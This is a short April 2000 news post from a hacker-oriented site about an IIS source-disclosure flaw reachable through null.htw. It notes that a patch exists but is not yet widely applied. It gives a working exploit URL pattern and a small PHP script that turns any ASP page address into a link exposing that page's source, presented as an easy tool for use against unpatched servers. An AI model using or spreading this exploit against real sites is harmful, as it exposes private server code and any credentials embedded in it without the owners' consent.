SPONSOR 
 To print: Click here or Select File and then Print from your browser's menu

	--------------------------------------------------------------
	This story was printed from dtheatre.com,
	located at http://www.dtheatre.com/read.php?sid=846.
	--------------------------------------------------------------
Microsoft's Newest Gaping Security Hole
By SKillBot, (DT)
April 3, 2000 3:07 AM PT
(GN) On most sites that use Microsoft's ASP technology, you can view the source of any of the .asp files.?Bascially, any IIS server that can find null.htw will allow you to view the source.?A patch was released on friday.?But from what I've seen, it hasn't been widely used yet.?I was seriously thinking about sleeping tonight, too.?Click below for an example and a fun php script to make it easy.
Here's the general idea:
http://server/null.htw?CiWebHitsFile=/somefile.asp%20&CiRestriction=none&CiHiliteType=Full

And a php script that works some of the time: It takes the url you want to see the source to, and spits out a link that you can click on to see it.
<form>
<input type="text" name="input">
<input type="submit">
<?
if($input) {
eregi( "(http:\/\/)(.*\/)(.*asp)",$input,$regs);
echo  "<br>";
echo  "<a href=\"http://".$regs[2]. "null.htw?CiWebHitsFile=/".$regs[3]. "%20&CiRestriction=none&CiHiliteType=Full". "\">here</a><br>";
echo $regs[2]. " - ".$regs[3];
}
?>


All trademarks and copyrights on this page are owned by their respective owners. The rest © 2000 dtheatre.com, Ai Graphics
SPONSOR